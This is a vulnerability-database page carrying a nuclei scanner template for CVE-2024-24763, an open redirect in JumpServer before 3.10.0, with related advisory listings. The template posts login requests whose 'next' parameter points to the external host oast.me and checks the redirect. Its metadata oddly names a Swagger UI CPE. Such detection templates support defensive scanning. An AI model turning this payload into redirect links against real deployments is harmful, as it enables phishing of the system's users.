Lucene search
K

JumpServer < 3.10.0 - Open Redirect

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 58 Views

JumpServer < 3.10.0 - Open Redirect. Attackers can exploit this to construct malicious links leading to phishing or cross-site scripting attack

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-24763
20 Feb 202419:27
circl
CNNVD
JumpServer Security Vulnerability
20 Feb 202400:00
cnnvd
CVE
CVE-2024-24763
20 Feb 202417:35
cve
Cvelist
CVE-2024-24763 JumpServer Open Redirect Vulnerability
20 Feb 202417:35
cvelist
NVD
CVE-2024-24763
20 Feb 202418:15
nvd
OSV
CVE-2024-24763 JumpServer Open Redirect Vulnerability
20 Feb 202417:35
osv
Prion
Cross site scripting
20 Feb 202418:15
prion
Positive Technologies
PT-2024-20541 · Unknown · Jumpserver
20 Feb 202400:00
ptsecurity
RedhatCVE
CVE-2024-24763
23 May 202507:29
redhatcve
Vulnrichment
CVE-2024-24763 JumpServer Open Redirect Vulnerability
20 Feb 202417:35
vulnrichment
Rows per page
id: CVE-2024-24763

info:
  name: JumpServer < 3.10.0 - Open Redirect
  author: ritikchaddha
  severity: medium
  description: |
    JumpServer is an open source bastion host and an operation and maintenance security audit system. Prior to version 3.10.0, attackers can exploit this vulnerability to construct malicious links, leading users to click on them, thereby facilitating phishing attacks or cross-site scripting attacks. Version 3.10.0 contains a patch for this issue. No known workarounds are available.
  impact: |
    Unauthenticated attackers can redirect users to malicious URLs via the next parameter, facilitating phishing attacks or cross-site scripting.
  remediation: |
    Update JumpServer to version 3.10.0 or later.
  reference:
    - https://github.com/jumpserver/jumpserver/security/advisories/GHSA-p2mq-cm25-g4m5
    - https://nvd.nist.gov/vuln/detail/CVE-2024-24763
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L
    cvss-score: 4.3
    cve-id: CVE-2024-24763
    cwe-id: CWE-601
    epss-score: 0.01057
    epss-percentile: 0.60363
    cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: fit2cloud
    product: jumpserver
    fofa-query:
      - title="JumpServer"
      - title="jumpserver"
  tags: cve2024,cve,jumpserver,redirect,fit2cloud,authenticated,vuln

http:
  - raw:
      - |
        POST /{{paths}} HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}

    payloads:
      paths:
        - "core/auth/login/?next=//oast.me"
        - "auth/login/?next=//oast.me"
        - "login/?next=//oast.me"

    matchers:
      - type: regex
        part: header
        regex:
          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$'
# digest: 4b0a00483046022100c3f7537f7659eb33088bf3c5838d9f2c7bed610e2063fc66429e6fd74b3df24c0221008c71872887c060b7e9d5a25218f1bfd549082b146ea3a06bccc1fd7c33e7c151:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 3.14.3 - 6.1
EPSS0.01057
SSVC
58